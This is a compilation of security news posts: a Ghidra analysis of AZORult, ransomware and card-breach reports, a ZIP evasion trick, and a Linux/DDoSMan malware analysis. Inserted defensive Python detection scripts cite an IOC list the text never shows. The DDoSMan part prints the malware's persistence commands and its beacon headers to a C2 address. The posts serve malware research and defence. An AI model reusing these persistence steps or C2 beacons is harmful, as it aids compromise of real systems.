SSDEEP: 12288:KKi7ifyf5/TIEAcp2o/DZDlvs6SskijhnHW3/qgQrjSh4rNxPXJE:K6m5UYZRUokohnH4QrjCCP5E

The sample is a PE32 file apparently coded in Visual C++, containing references to major IT companies in its metadata fields like Google and Amazon.

Figure 1: Static information about the sample

Dynamically executing the malware, we are able to isolate only a few actions of the malware, because its C2 server wasn’t active at the time of analysis, probably due to a configuration error.

Figure 2: Communication of the malware with the C2

So, after contacting the server, the sample cannot download other components and configurations; the malware therefore kills itself and terminates its execution. For this reason, we focused the investigation on static analysis and debugging.

Digging into the Sample

The first details about the malware’s inner workings were retrieved through API call tracing, where some interesting APIs emerged: the malware checks the active processes, looking for typical malware analysis tools such as Wireshark, Process Explorer and Process Monitor.

Figure 3: API logging of the malware

Among the API calls, one is quite interesting: an OpenProcess call on the process itself, which references a portable executable embedded inside the original file: the payload.

Figure 4: Breakpoint on OpenProcess API allowing payload dump

Reversing the Payload with Ghidra

Hash: 70d038d221f79baf9114bf37815fe593965c28218fd70e72827a94984f52d968
Threat: Azorult – Payload
Size: 128 KB
SSDEEP: 3072:YxRaX6raoCoCyz6/mqv1JR+yBtGOeheWgieGq:caZ1tme+1wie5

The extracted payload is written in Delphi, as confirmed by a first preliminary analysis. We therefore decided to test Ghidra in order to statically analyze the malware.

Figure 6: Static information about the Azorult payload

Using Ghidra’s string search function we found the hardcoded C2 address in plain text, meaning the malware writers did not bother to protect the payload, only the container. This IP address is the same one seen during the dynamic analysis, as shown in Figure 2. The malware also uses a custom user-agent.

Figure 7: Communication routine with the C2 and hardcoded address

Then, we managed to gather the characteristic strings of the payload, finding many interesting ones, extensively reported in the section “Configuration Strings”. Thanks to this, we have also isolated the AZORult routine used to gather and store the Mozilla cookies (Figure 8).

Figure 8: Routine for gathering information of Mozilla

Digging further, we identified the “shell routine”, which allows the command and control operator to execute arbitrary commands on the victim machine. The code snippet in Figure 9 shows how the malware uses this capability to delete its execution traces from the victim machine.

We also leveraged Ghidra’s built-in script engines to test Yara rules against the inspected code. This flexibility is one of the main characteristics that make Ghidra a valuable tool for a reverse engineer.

Figure 10: Ghidra scripts list

Using the “YaraGhidraGUIScript”, available off-the-shelf in the tool, we managed to write down an ad hoc rule to spot the in-memory payload.

Figure 11: Yara Ghidra GUI script

The usage of this extension is quite intuitive: the analyst selects the piece of disassembled code he or she considers representative of the malicious behaviour.

Figure 12: Selection of the piece of code to generate the Yara Rule

For instance, the selected piece of code in Figure 12 refers to the routine used by AZORult to contact the C2 with the specific User-Agent. Selecting it in the “YaraGhidraGUIScript” opens a new popup form that offers the analyst a powerful Yara generation helper.

Figure 13: GUI of the Ghidra plugin

The Yara GUI proposes a rule and allows the analyst to edit it freely: in this case the hex values of the PUSH and MOV operands may depend on the current virtual addressing of the specific machine, so by clicking on these values the script replaces the operand bytes with the wildcard “?”, preserving the opcode bytes of the assembly instructions.

Figure 14: Refinement of the generated Yara Rule by replacing the operand values with wildcards

The resulting Yara rule is reported in the section “Yara rules” below.
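The operand-wildcarding step the GUI performs can be reproduced outside Ghidra; the following Python is an added example, not the YaraGhidraGUIScript and not Yoroi’s rule. It decodes a small subset of x86-32 instructions (push/mov immediates, call/jmp rel32, push/pop reg, nop, ret), keeps the opcode bytes, replaces the operand bytes with “??”, emits a Yara rule, and uses a tiny hex-pattern matcher to check that the wildcarded pattern still matches a relocated copy of the routine where the literal pattern does not. The byte sequences ORIGINAL and RELOCATED are constructed stand-ins for a C2-contact routine, not bytes from the AZORult sample.

```python
import re

# Minimal x86-32 opcode table for the demo: opcode -> (mnemonic, number of
# trailing operand bytes that hold an immediate, address or displacement).
SIMPLE_OPCODES = {
    0x68: ("push imm32", 4),
    0x6A: ("push imm8", 1),
    0xE8: ("call rel32", 4),
    0xE9: ("jmp rel32", 4),
    0x90: ("nop", 0),
    0xC3: ("ret", 0),
}


def decode(code: bytes):
    """Yield (mnemonic, opcode bytes, operand bytes) for the supported subset."""
    i = 0
    while i < len(code):
        op = code[i]
        if op in SIMPLE_OPCODES:
            name, n = SIMPLE_OPCODES[op]
        elif 0xB8 <= op <= 0xBF:
            name, n = "mov r32, imm32", 4
        elif 0x50 <= op <= 0x57:
            name, n = "push r32", 0
        elif 0x58 <= op <= 0x5F:
            name, n = "pop r32", 0
        else:
            raise ValueError(f"unsupported opcode {op:#04x} at offset {i}")
        if i + 1 + n > len(code):
            raise ValueError(f"truncated instruction at offset {i}")
        yield name, code[i:i + 1], code[i + 1:i + 1 + n]
        i += 1 + n


def to_yara_hex(code: bytes, wildcard_operands: bool = True) -> str:
    """Yara hex string: opcode bytes literal, operand bytes as '??' when asked."""
    parts = []
    for _name, opcode, operands in decode(code):
        parts.append(opcode.hex().upper())
        parts.extend("??" if wildcard_operands else f"{b:02X}" for b in operands)
    return "{ " + " ".join(parts) + " }"


def make_rule(name: str, code: bytes, description: str) -> str:
    """Wrap the wildcarded pattern in a complete Yara rule."""
    return (
        f"rule {name}\n{{\n"
        f"    meta:\n        description = \"{description}\"\n"
        f"    strings:\n        $code = {to_yara_hex(code)}\n"
        f"    condition:\n        $code\n}}\n"
    )


def hex_pattern_to_regex(pattern: str):
    """Tiny matcher for the '{ XX ?? }' subset of Yara hex strings (no jumps)."""
    tokens = pattern.strip().strip("{}").split()
    rx = b"".join(b"." if t == "??" else re.escape(bytes([int(t, 16)])) for t in tokens)
    return re.compile(rx, re.DOTALL)


def pattern_matches(pattern: str, blob: bytes) -> bool:
    return hex_pattern_to_regex(pattern).search(blob) is not None


# Constructed stand-in for the C2-contact routine: push the address of a string,
# load a register with an immediate, call a helper, return.  RELOCATED is the
# "same" code at another load address, so the pushed pointer and the call
# displacement differ while the opcodes do not.
ORIGINAL = bytes.fromhex("68 A0 3C 41 00 B8 10 20 30 40 E8 1B 00 00 00 C3")
RELOCATED = bytes.fromhex("68 A0 5C 42 00 B8 10 20 30 40 E8 F3 FF FF FF C3")

if __name__ == "__main__":
    print(make_rule("azorult_c2_routine_demo", ORIGINAL, "constructed demo rule"))
    print("wildcarded matches relocated copy:", pattern_matches(to_yara_hex(ORIGINAL), RELOCATED))
    print("literal matches relocated copy:   ",
          pattern_matches(to_yara_hex(ORIGINAL, wildcard_operands=False), RELOCATED))
```

The design point is the same one the GUI makes: wildcarding only the bytes that encode addresses keeps the rule tied to the instruction sequence while surviving relocation, whereas wildcarding whole instructions or hashing the region would either over-match or break on the next build of the sample.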

Conclusion

Ghidra is a valuable tool in the arsenal of a reverse engineer. It freely provides advanced features such as code decompilation, which were typically available only in high-end commercial products accessible to well-budgeted professionals. The NSA’s choice to give back to the security community is admirable, especially because the tool itself is solid and has advanced features that make it suitable for professional use.

It would be conceptually wrong, however, to compare it directly with commercial products or to ask whether it can replace any of them; after this field test we can confirm that Ghidra is a valuable tool that should be included in every reverse engineer’s arsenal.


Further technical details, including Indicators of Compromise (IoCs) and Yara rules are reported in the analysis published on the Yoroi blog:

Pierluigi Paganini

(SecurityAffairs – Ghidra, malware)

The post Analyzing AZORult malware using NSA Ghidra suite appeared first on Security Affairs.


Computer systems in the City of Albany hit in Ransomware Attack

Another ransomware attack made the headlines, this time the victim is the City of Albany, its computer systems were infected with the malware.

Computer systems in the City of Albany, New York, were infected with ransomware over the weekend that disrupted some municipal computers.

According to Albany Mayor Kathy Sheehan, no personal information belonging to government workers or residents was compromised during the ransomware attack.

[Image: City of Albany. Source: Albanyhomes411.com]

According to the Times Union, the City of Albany will offer credit monitoring to its employees as a precaution.

“Albany Mayor Kathy Sheehan says it appears no personal information about government workers or residents was taken during a weekend ransomware attack that disabled some municipal computers.” reads the post published by the USNews website.

The mayor confirmed that the ransomware attack did not affect the dispatching of police and firefighters.

The ransomware attack began on Saturday morning; at the time of writing, authorities had not provided technical details about the attack.

Hackers gain access to the computers and then refuse to release control until a ransom is paid.

In the past, similar attacks were reported in the US, in January the City Hall of Del Rio, Texas, was hit by a ransomware attack and operations were suspended.

In April 2018 a massive ransomware attack hit computer systems in the City of Atlanta, while in November 2018 the City of Spring Hill, Tenn., suffered a ransomware attack.

Pierluigi Paganini

(SecurityAffairs – City of Albany , ransomware attack)

The post Computer systems in the City of Albany hit in Ransomware Attack appeared first on Security Affairs.


E Hacking News – Latest Hacker News and IT Security News: Banking Malware Being Distributed By Hackers Via Password Protected Zip Files!

Cybercriminals have a new way of wreaking havoc: hackers have found another way to bypass security controls, and reportedly the infamous BOM technique is to blame.

The “Byte Order Mark” technique works by tampering with the first bytes of the file dropped on the victim’s Windows system.

The main advantage of the BOM for the threat actor group is staying below the line of detection.

Researchers from a very well-known anti-virus firm noticed a new campaign that relied mainly on spear phishing.

The spear-phishing messages deliver the infected files to the victim’s system.

The moment the user attempts to open the ZIP file using their default browser, it all crashes and an error sign pops up, saying.

According to the researchers, legitimate ZIP files start with the bytes “PK” (0x504B). Files carrying a BOM have three extra leading bytes (0xEFBBBF), the byte order mark found at the start of UTF-8 text files.

On some systems the ZIP archive format goes undetected, while on others the file is recognised as a UTF-8 text file and the malicious payload isn’t extracted.

The same files can, however, be opened with third-party utilities such as 7-Zip and WinRAR.

Once the extraction of the file is done, the malware is executed thence beginning the infection process.

Systems using third party utilities are more susceptible to such malware attacks than the rest.
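The BOM trick and the check that defeats it, as an added example (not code from the anti-virus firm’s research): a naive type detector that trusts the first bytes labels the BOM-prefixed archive as UTF-8 text, while inspect_archive strips a leading 0xEFBBBF before looking for the PK header and parses what is left with Python’s zipfile module, so a mail gateway or sandbox still sees the archive members. The sample archive and its setup.exe member are constructed in memory; the member holds dummy bytes, not a real executable.

```python
import io
import zipfile

UTF8_BOM = b"\xef\xbb\xbf"          # the three bytes named in the article (0xEFBBBF)
ZIP_LOCAL_HEADER = b"PK\x03\x04"    # "PK" (0x504B) followed by the local-file-header tag
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".js", ".vbs")


def naive_type(data: bytes) -> str:
    """What a detector that trusts only the first bytes concludes."""
    if data.startswith(UTF8_BOM):
        return "utf-8-text"
    if data.startswith(ZIP_LOCAL_HEADER):
        return "zip"
    return "unknown"


def inspect_archive(data: bytes) -> dict:
    """Strip a leading BOM, then parse what is left as a ZIP archive."""
    result = {"bom_prefixed": False, "is_zip": False, "members": [],
              "has_executable": False, "verdict": "not an archive"}
    body = data
    if data.startswith(UTF8_BOM):
        result["bom_prefixed"] = True
        body = data[len(UTF8_BOM):]
    if not body.startswith(ZIP_LOCAL_HEADER):
        return result
    try:
        with zipfile.ZipFile(io.BytesIO(body)) as zf:
            members = zf.namelist()
    except zipfile.BadZipFile:
        result["verdict"] = "zip header but unreadable archive"
        return result
    result["is_zip"] = True
    result["members"] = members
    result["has_executable"] = any(m.lower().endswith(EXECUTABLE_SUFFIXES) for m in members)
    if result["bom_prefixed"]:
        result["verdict"] = "suspicious: ZIP archive hidden behind a UTF-8 BOM"
    elif result["has_executable"]:
        result["verdict"] = "archive containing executable content"
    else:
        result["verdict"] = "plain archive"
    return result


def make_sample_zip(member: str, content: bytes) -> bytes:
    """Build a small archive in memory (constructed test data, not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member, content)
    return buf.getvalue()


def demo() -> tuple:
    """Return (naive label of the BOM-wrapped file, plain result, BOM-wrapped result)."""
    plain = make_sample_zip("setup.exe", b"MZ" + b"\x00" * 64)  # dummy bytes, not a binary
    bom_wrapped = UTF8_BOM + plain
    return naive_type(bom_wrapped), inspect_archive(plain), inspect_archive(bom_wrapped)


if __name__ == "__main__":
    naive, plain_result, bom_result = demo()
    print("naive detector says:", naive)
    print("plain archive:      ", plain_result["verdict"], plain_result["members"])
    print("BOM-wrapped archive:", bom_result["verdict"], bom_result["members"])
```

The practical rule for a scanner is to treat a file as an archive if a PK header appears after any of the common text-encoding prefixes, and to treat a BOM in front of binary structure as a signal in itself, since no legitimate tool writes one there.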

The malicious executable is just a tool to help load the main payload inserted within the main source section.

The malware originates from a DLL with a BICDAT function encrypted with an XOR-based algorithm.
The library then downloads the second-stage payload, the password-protected ZIP file.
The downloaded payload is encrypted with the same functions as the embedded payload.
After the necessary files are extracted, the final payload, which goes by the name of “Banking RAT malware”, is launched.
This RAT harvests information such as access card codes, dates of birth, account passwords, electronic signatures and e-banking passwords from the system.



Inside job: Bithumb crypto exchange hacked again; loses $20 million

By ghostadmin

This is the third time that Bithumb has been hacked to steal millions in cryptocurrency. Crypto industry is being hammered by cybercriminals with full frequency lately. There are reports of a new attack against South Korean bitcoin exchange called Bithumb due to which the exchange got hacked. The attack occurred on the morning of Saturday. This […]

This is a post from HackRead.com Read the original post: Inside job: Bithumb crypto exchange hacked again; loses $20 million

Buca di Beppo, Planet Hollywood and other restaurants owned by Earl Enterprises hit by card breach

Last week, Earl Enterprises admitted having suffered a payment card data breach from tens of its restaurants over a period of 10 months.

Earl Enterprises admitted that hackers have stolen payment card data from tens of its restaurants over a period of 10 months.

Restaurants at Buca di Beppo, Earl of Sandwich, Planet Hollywood, Chicken Guy!, Mixology and Tequila Taqueria owned by Earl Enterprises were impacted by the security breach. An investigation confirmed that almost all the Buca di Beppo locations across the United States have been affected by the breach. The incident also impacted many other locations belonging to the other brands of the Earl Enterprises holding.

Crooks used PoS malware to siphon payment card data from point-of-sale (PoS) systems at the affected locations. The malicious code was designed to capture card numbers, expiration dates and cardholder names.

Customers that made payment at the impacted locations between May 23, 2018 and March 18, 2019, may be affected. Earl Enterprises published a notice of breach that allows users to discover potentially affected restaurants.

“Earl Enterprises recently became aware of a data security incident potentially affecting payment card information of a limited number of guests that dined at certain of Earl Enterprises’ restaurants. Potentially affected restaurants include the following brands: Buca di Beppo, Earl of Sandwich, Planet Hollywood, Chicken Guy!, Mixology and Tequila Taqueria.” reads the data breach notification. “We are providing this notice to our guests to inform them of the incident and steps they can take to help protect themselves. The security and privacy of our guests’ payment card data is a top priority, and Earl Enterprises deeply regrets that this incident occurred.”

According to the data breach notification, Planet Hollywood hotels and stores, Bertucci’s, Seaside on the Pier and Café Hollywood were not affected.

“This incident may affect payment card information of a limited number of guests that dined at certain of Earl Enterprises’ restaurants. Payment card information could have included credit and debit card numbers, expiration dates and, in some cases, cardholder names.” continues the notice.

The company confirmed that locations outside of the United States were not affected.

Unfortunately, the stolen data may already be available on the cybercrime underground. The popular investigator Brian Krebs reported that, on February 20, the black marketplace Joker’s Stash had offered for sale roughly 2.15 million stolen cards that appeared to have been stolen from Earl Enterprises restaurants.

Krebs reported his discovery to Earl Enterprises, which quickly launched an investigation with the support of two cybersecurity firms and federal law enforcement.

Pierluigi Paganini

(SecurityAffairs – Earl Enterprises, hacking)

The post Buca di Beppo, Planet Hollywood and other restaurants owned by Earl Enterprises hit by card breach appeared first on Security Affairs.


BREAKING: new update about DDoS’er Linux/DDoSMan ELF malware based on Elknot

The popular expert unixfreaxjp analyzed a new Chinese ELF DDoS malware, tracked as “Linux/DDoSMan”, that evolved from the Elknot malware to deliver a new ELF bot.

Non-Technical Premise

“This report is meant for incident response or Linux forensics purpose, TO HELP admin & IR folks”: with this very first sentence begins the new analysis by one of the reversers of the worldwide security community, the head of the MalwareMustDie team, (Mr.) unixfreaxjp. The first thought that comes to mind is: while everybody is looking for “fame” and “glory”, here is someone working hard just “TO HELP”. Is there a security group greater than this?

But let’s get to the findings.

unixfreaxjp’s new analysis describes a new Chinese ELF DDoS malware, “Linux/DDoSMan”, which appears to be a new DDoS botnet client installer that uses the old Elknot bot binary (also known as ChickDDoS or Mayday) together with a new ELF bot acting as downloader and persistence installer: these two ELF bot binaries are dropped by the newly found Linux/DDoSMan.

About this attribution, unixfreaxjp comments on VirusTotal as follows: “This is the new bot client of the “DDOS manager” toolkit used by China(PRC) DoS attacker. (….) The code seems inspired from multiple source code of China basis DDoS client, like Elknot. Not xorDDoS or ChinaZ one, not a surprise since many of code shared openly.”

But what kind of malware is this Elknot Trojan, and how did the MMD team find it in the first place? The story is well documented: one project of the MalwareMustDie (MMD) team has been actively monitoring the Chinese-origin ELF DDoS malware threat since Aug 2012. Growth was very rapid at that time (Sept. 2014), as described on the MMD blog, when MMD detected 5 variants active under almost 15 panels scattered across Chinese networks. A video describing their work shows that many Elknot analyses were posted.

On the MMD blog it is still possible to read: “I am quite active in supporting the team members of this project, so recently almost everyday I reverse ELF files between 5-10 binaries. They are not aiming servers with x32 or x64 architecture but the router devices that runs on Linux too.” We could say that here we have the “Mirai” idea ante litteram, two years before Mirai. Linux/Elknot was first analyzed and published publicly on kernelmode.info, in the “Elknot” thread, which links to the MMD behavior analysis report from 2013 and to a further debug report; the latter records the malware name as Linux/Elknot. Further analysis and reporting of the Elknot infection is written up in the same kernelmode.info thread. Thanks to the admin team of KernelMode, who still keep the documentation of this malware analysis available today.

At that time Linux/Elknot was known for multiple standard packet floods over several protocols (UDP, TCP, ICMP and HTTP); the DNS amplification attack of this Chinese series of DDoS trojans was first introduced by this malware, before Linux/BillGates started to be detected. We can say the Linux/Elknot series is the oldest root of the many ELF flooders built by adversaries in the same territory, and one of the most popular ELF flooders there during 2014.

If we look at the Akamai blog, we can still find a reference to Elknot in a post from April 4, 2016 about “BillGates”, another DDoS malware whose “attack vectors available within the toolkit include: ICMP flood, TCP flood, UDP flood, SYN flood, HTTP Flood (Layer7) and DNS reflection floods. This malware is an update and reuse from the Elknot’s malware source code. It’s been detected in the wild for a few years now.” So the Akamai blog explicitly talks about Elknot, links directly to the MalwareMustDie blog, and notes, in politically correct language, that for the “botnet activity, most of the organizations are located in the Asia region”. Going deeper into the Elknot series analysis on the MMD blog mentioned above (the post about the ARM version of Elknot, with its many specific modifications reversed and reported), we find a lot of interesting information and learn a lot about Chinese malware, including the Elknot scheme.


Figure 1: The ARM version of Elknot malware on MMD blog

Inside this post we can find many considerations about the behavior of the malware and of the threat actor, such as the encryption of the binary and of the communication: “This a sign of protection, someone want to hide something, in the end that person is hiding EVERYTHING which ending up to be very suspicious 🙂 – So the binary could be packed or encrypted protection, we have many possibility.

Further details of this family of ELF malware we posted regularly in here:–>[link]”

Further details on Linux/AESDDoS are on kernelmode.info, as referenced by unixfreaxjp in his new analysis, which can be found here: https://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483

The new Malware

But let’s go back to the new analysis: we have a combination of “new” and “old” code that allows the bot client to interact with a server across the multiple platforms used by this botnet. The ELF bot (the client) is delivered to compromised Linux devices, while the C&C (a Win32 PE) listens on a Windows platform, waiting for the callbacks sent by the bot installer. The new ELF is the “downloader” and “installer”, while the old Elknot code manages the DDoS-related configuration part: executing commands sent from the C2, sending statistics about the infected servers, threading, DDoS attacks, etc., as shown in the next figure.


Figure 2: The C2 software for Linux DDoS

Going deeper into unixfreaxjp’s analysis, we read more about the new scheme adopted in the malware configuration:

“The C2 tool is having IP node scanner and attack function to compromise weak x86?32 server secured auth, DoS attack related commands to control the botnet nodes, and the payload management tools. Other supportive samples also exist to help to distribute the Linux bot installer to be sent successfully to the compromised device, it works under control of the C2 tool. This C2 scheme is new, along with the installer / updater. The Elknot DoS ELF dropped is not new.”

But let’s see which binaries are executed and what an administrator will see during the first stage of the infection, since this analysis was made to raise system administrators’ awareness:

Installation-related code execution:

execve("/tmp/upgrade");                                                 // executes the "upgrade"
execve("/bin/update-rc.d", ["update-rc.d", "python3.O", "defaults"]);  // registers the malicious task
execve("/usr/bin/chkconfig", ["chkconfig", "--add", "python3.O"]);     // persistence

What the administrator will see:

An (unknown) process whose image is visible via /proc/{PID}/cmdline, forked from an “evil” crond process (the dropped, executed and then deleted malware).
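The three indicators above (the /tmp/upgrade dropper, the crond that was executed and then deleted, and the "python3.O" service registered via update-rc.d / chkconfig) can be checked from a live box or a mounted image. The script below is an added triage example for administrators, not code from unixfreaxjp's analysis; the sample process tree it builds is constructed.

```python
"""Triage checks for the Linux/DDoSMan installation indicators above.

Added example for defenders, not part of unixfreaxjp's analysis. Checks run
against a root directory (live "/" or a mounted image) for the dropper path,
a crond running from a deleted file, and the "python3.O" service registered
through update-rc.d / chkconfig. The sample tree below is constructed.
"""
import os
import tempfile

DROPPER_PATH = "/tmp/upgrade"   # path executed by the installer (from the post)
SERVICE_NAME = "python3.O"      # name given to update-rc.d / chkconfig (capital O)
SYSTEM_BIN_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")


def _read(path):
    try:
        with open(path, "rb") as fh:
            return fh.read().decode("utf-8", "replace")
    except OSError:
        return ""


def read_proc(root):
    """Collect pid -> {exe, cmdline, ppid} from <root>/proc."""
    procs, proc_dir = {}, os.path.join(root, "proc")
    for name in os.listdir(proc_dir) if os.path.isdir(proc_dir) else []:
        if not name.isdigit():
            continue
        base = os.path.join(proc_dir, name)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:
            exe = ""
        # /proc/<pid>/cmdline separates arguments with NUL bytes
        cmdline = _read(os.path.join(base, "cmdline")).replace("\0", " ").strip()
        ppid = ""
        for line in _read(os.path.join(base, "status")).splitlines():
            if line.startswith("PPid:"):
                ppid = line.split(":", 1)[1].strip()
        procs[int(name)] = {"exe": exe, "cmdline": cmdline, "ppid": ppid}
    return procs


def suspicious_processes(root):
    """Flag processes matching what the post says an administrator will see."""
    findings, procs = [], read_proc(root)
    for pid, info in sorted(procs.items()):
        exe, cmd = info["exe"], info["cmdline"]
        # Dropped, executed, unlinked: the kernel appends " (deleted)" to exe
        if exe.endswith(" (deleted)"):
            findings.append(f"pid {pid}: running from deleted file {exe}")
        if cmd.split(" ")[0] == DROPPER_PATH or exe.startswith(DROPPER_PATH):
            findings.append(f"pid {pid}: executing dropper path {DROPPER_PATH}")
        # Child of a "crond" whose image is not the distribution's cron binary
        parent = procs.get(int(info["ppid"])) if info["ppid"].isdigit() else None
        if parent and "crond" in parent["cmdline"] \
                and not parent["exe"].startswith(SYSTEM_BIN_PREFIXES):
            findings.append(f"pid {pid}: forked from suspicious crond pid "
                            f"{info['ppid']} ({parent['exe']})")
    return findings


def persistence_artifacts(root):
    """Find the init script and rc links created by update-rc.d / chkconfig."""
    found = []
    init_script = os.path.join(root, "etc", "init.d", SERVICE_NAME)
    if os.path.lexists(init_script):
        found.append(init_script)
    for level in range(7):
        rc_dir = os.path.join(root, "etc", f"rc{level}.d")
        if os.path.isdir(rc_dir):
            found += [os.path.join(rc_dir, e) for e in sorted(os.listdir(rc_dir))
                      if e.endswith(SERVICE_NAME)]
    return found


def build_fake_root():
    """Constructed tree mimicking an infected host (sample data, not real)."""
    root = tempfile.mkdtemp()

    def add_proc(pid, exe, cmdline, ppid):
        d = os.path.join(root, "proc", str(pid))
        os.makedirs(d)
        os.symlink(exe, os.path.join(d, "exe"))
        with open(os.path.join(d, "cmdline"), "wb") as fh:
            fh.write(cmdline)
        with open(os.path.join(d, "status"), "w") as fh:
            fh.write(f"Name:\tx\nPPid:\t{ppid}\n")

    add_proc(1, "/sbin/init", b"/sbin/init\0", 0)
    add_proc(700, "/usr/sbin/cron", b"/usr/sbin/cron\0", 1)          # legitimate cron
    add_proc(4242, "/tmp/crond (deleted)", b"crond\0", 1)            # evil crond, unlinked
    add_proc(4243, DROPPER_PATH, DROPPER_PATH.encode() + b"\0", 4242)  # its "upgrade" child
    os.makedirs(os.path.join(root, "etc", "init.d"))
    with open(os.path.join(root, "etc", "init.d", SERVICE_NAME), "w") as fh:
        fh.write("#!/bin/sh\n")
    os.makedirs(os.path.join(root, "etc", "rc3.d"))
    os.symlink(f"../init.d/{SERVICE_NAME}", os.path.join(root, "etc", "rc3.d", f"S20{SERVICE_NAME}"))
    return root


if __name__ == "__main__":
    fake = build_fake_root()
    print(*suspicious_processes(fake) + persistence_artifacts(fake), sep="\n")
```

Run against "/" on a live host the same functions report real processes and init entries; on a mounted image pass its mount point as root.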

The Client Side

Looking at the bot client, we see that once the malware has infected the remote host, the installer ELF reads all server process info by calling open(“/proc/{PID}/cmdline”) for further malicious purposes. The bot client then collects data about the infected system and sends it to the C2 in the URL, as shown in the screenshot below. The purpose of this data is to tell the C2 which system is infected, so that the C2 can send traffic back to the infected machine with the upgrade binary for further infection, and to keep statistics of infected machines. The data of infected machines is sorted by the Windows C2 utility called “Manager”, shown in the Win32 GUI screenshot above, and that C2 tool sends the infected machine data to a static page served on another host on the web (which now seems to have been abandoned by the adversary).

Figure 3: Header of the ELF communication

The data is sent from the bot client to the C2 via the malware’s “fabricated” headers, shown below, and processed further as described above. This HTTP header set is distinctive and can be used to detect and mitigate the threat; this behaviour is new and was not spotted in Elknot.

Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: {SIZE OF SENT DATA}\r\n
Host: 193[.]201[.]224[.]238:8852\r\n
User-Agent: LuaSocket 3.0-rc1\r\n
TE: trailers\r\n
Connection: close, TE\r\n\r\n
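A detection check built around the header set above, added here as an example and not part of unixfreaxjp's analysis; the two sample requests are constructed, and the IOC host and ports are the ones listed in this post's infrastructure section. Because the User-Agent, TE and Connection values are LuaSocket's own client defaults, the check weights them together with the form-encoded POST and the destination rather than matching the User-Agent alone.

```python
"""Scoring check for the Linux/DDoSMan beacon header set shown above.

Added example for defenders, not part of unixfreaxjp's analysis. It parses a
raw HTTP request and scores it against the fabricated headers, the
form-encoded POST and the C2 host/ports listed in this post's IOC section.
Both sample requests are constructed.
"""

BOT_USER_AGENT = "LuaSocket 3.0-rc1"
BOT_TE = "trailers"
BOT_CONNECTION = "close, te"
BOT_CONTENT_TYPE = "application/x-www-form-urlencoded"
IOC_HOSTS = {"193.201.224.238", "cctybt.com"}   # from the IOC section of the post
IOC_PORTS = {8852, 8080}


def parse_request(raw):
    """Return (method, target, headers); header names are lower-cased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue                      # tolerate a stray or blank line
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def split_host(host):
    """'193.201.224.238:8852' -> ('193.201.224.238', 8852); default port 80."""
    name, _, port = host.partition(":")
    return name, int(port) if port.isdigit() else 80


def score_request(raw):
    """Higher score = closer match to the DDoSMan beacon; returns (score, reasons)."""
    method, _target, h = parse_request(raw)
    score, reasons = 0, []
    if h.get("user-agent") == BOT_USER_AGENT:
        score += 2
        reasons.append("user-agent LuaSocket 3.0-rc1")
    # LuaSocket's HTTP client emits exactly these two headers by default, so
    # they corroborate the user-agent rather than standing on their own.
    if h.get("te", "").lower() == BOT_TE and h.get("connection", "").lower() == BOT_CONNECTION:
        score += 2
        reasons.append("TE: trailers + Connection: close, TE")
    if method == "POST" and h.get("content-type", "").lower().startswith(BOT_CONTENT_TYPE):
        score += 1
        reasons.append("form-encoded POST body")
    name, port = split_host(h.get("host", ""))
    if name in IOC_HOSTS:
        score += 2
        reasons.append(f"destination host {name} in IOC list")
    if port in IOC_PORTS:
        score += 1
        reasons.append(f"destination port {port} in IOC list")
    return score, reasons


def is_ddosman_beacon(raw, threshold=5):
    """A generic Lua client scores 4; the beacon's POST and C2 destination push it past 5."""
    return score_request(raw)[0] >= threshold


# Constructed beacon modelled on the header set quoted in the post; the body
# fields are invented placeholders for the infected-system data it reports.
BEACON = (
    b"POST / HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 26\r\n"
    b"Host: 193.201.224.238:8852\r\n"
    b"User-Agent: LuaSocket 3.0-rc1\r\n"
    b"TE: trailers\r\n"
    b"Connection: close, TE\r\n\r\n"
    b"os=linux&arch=x86_64&ver=1"
)

# Constructed benign request: an ordinary Lua client talking to a normal host.
BENIGN = (
    b"GET /status HTTP/1.1\r\n"
    b"Host: updates.example.org\r\n"
    b"User-Agent: LuaSocket 3.0-rc1\r\n"
    b"TE: trailers\r\n"
    b"Connection: close, TE\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("beacon", BEACON), ("benign", BENIGN)):
        print(label, is_ddosman_beacon(req), score_request(req))
```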

By contrast, the Linux/Elknot bot client series always sends and receives its C2 data in encoded form, with a lot of 00 padding in between, using assembly-level obfuscation to rotate the encoded values. Elknot also does not use HTTP to talk to its C2: it writes the communication data directly into packets on an established TCP connection to a specific port (a custom protocol often used by Chinese malware on both Windows and Linux).

After the initial communication is established, the C2 sends the “upgrade” to the Linux/DDoSMan bot client according to the platform of the infected server: it is saved, renamed and executed on the infected node as the upgraded version of the initial malware. The bot client then starts its main function. unixfreaxjp’s analysis says that its further processing, including dropping the ELF binaries embedded in the main ELF binary, serves to execute them so that each performs its part of the malicious activity. “The dropped & executed “downloader” embedded ELF is actually the one that is responsible for the “persistence setup” operation too. This part hasn’t been seen in Elknot. And this is not even in the main sample file too. In THIS dropped ELF you can see well the downloader and the persistence installer in the same file.”

See the next figure for the explanation:

Figure 4: Snapshot of the Installer/downloader

Additionally, the same connection is reused: the initial code that opens the connection to the C2 is also responsible for managing the update of the malware on the infected node.

“So only one dropped binary is the Elknot,” says unixfreaxjp, “Obviously, there is no DDoS functionality in the main sample ELF file or the Downloader ELF file too, the Elknot has it, and the adversary tend to use that function from the C2 tool.”

The Server Side (C2 Tool)

Regarding the C2 tool, it is a Win32 PE with the Elknot-based C2 form, along with many additional forms, as shown in Figure 2. We can see the scanner tool and an interface for sending commands to a Linux shell after an attack has succeeded. With these capabilities the threat actor can use any compromised Windows machine to manage the C2 for its attacks.

To carry out the malicious intent, the attacker needs the ELF file to send, the script to be sent to the hacked PC, and the ELF file to be installed after infection, along with its execution toolset.

To get an idea of “how the adversary work in making this toolset”, MMD has produced a very interesting video, published on YouTube, describing the techniques adopted by the Chinese threat actors.

Figure 5: MMD video on YouTube describing Chinese threat actors’ techniques for delivering malware, recorded live from a compromised server.

